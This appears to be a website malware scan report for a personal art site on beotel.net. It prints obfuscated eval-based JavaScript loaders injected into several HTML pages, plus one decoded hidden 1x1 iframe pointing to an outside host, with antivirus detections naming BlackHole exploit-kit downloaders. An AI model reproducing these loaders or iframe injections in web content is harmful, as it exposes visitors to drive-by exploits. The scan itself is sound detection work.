1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA

http://users.beotel.net/~mrz/jana/content/paintings/../../content/video/../../paintings.html
200 OK
Content-Length: 14040
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA

http://users.beotel.net/~mrz/jana/content/paintings/../../content/video/../../index.html
200 OK
Content-Length: 13873
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,22,19,61,30,49,15,59,21,55,0,0,0,0,0,0,4,12,58,34,24,48,0,23,52,17,51,57,39,29,31,20,11,36,33,47,14,25,46,54,3,38,44,0,0,0,0,13,0,41,53,45,43,40,50,27,37,32,62,2,10,56,7,5,6,8,9,35,28,42,26,18,1,60,16);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("UfyEG2AfFGeHAntH_sKRO4DR_XAJk9tHD4qhn1ebGgAYnWtHIG3LluehGpcbxPZbFPyCpdyCpgZCH2SJsNVE8wTKHGrBL24hRXVJp0jKHJ0BQPAKCNT3EN4mQsrYnVUYlfyEG2AfFSKR")

Decoded script:


<iframe width="1" height="1" src="http://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"

Antivirus reports:

TrendMicro-HouseCall
Mal_Hifrm
TrendMicro
Mal_Hifrm

http://users.beotel.net/~mrz/jana/content/paintings/../../content/video/../../photo.html
200 OK
Content-Length: 13454
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61
... 3004 bytes are skipped ...
Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.F47V1025
Emsisoft
JS:Exploit.BlackHole.OA (B)
Comodo
TrojWare.JS.Kryptik.xt
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS

http://users.beotel.net/~mrz/jana/content/paintings/../../content/video/../../instalations.html
200 OK
Content-Length: 13254
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

pnfcu=String;tvlnip="spl"+"i"+"t";aleibo=window;tzqu=(1)?"0x":"123";ncqyko=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(hcane){xcgru=false;try{}catch(jqa){xcgru=21;}
if(1){nxje="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6d
... 3004 bytes are skipped ...
1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5dZq66Zq68Zq6dZq70Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[tvlnip]("Zq");}aleibo=nxje;lacjy=[];for(cvyd=22-20-2;-cvyd+1406!=0;cvyd+=1){qvg=cvyd;if((0x19==031))lacjy+=pnfcu.fromCharCode(eval(tzqu+aleibo[1*qvg])+0xa-ncqyko);}dow=eval;z=123;if(Math.ceil(5.5)===6)dow(lacjy)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Exploit.BlackHole.OA
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Kryptik.xt
CAT-QuickHeal
HTM/Agent.NXJ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Kaspersky
Exploit.JS.Agent.bnu
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.OA
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.OA
Commtouch
JS/IFrame.RS
BitDefender
JS:Exploit.BlackHole.OA


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: beotel.net

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: beotel.net
Referer: http://www.google.com/search?q=beotel.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=beotel.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://beotel.net/

Result: beotel.net is not infected or malware details are not published yet.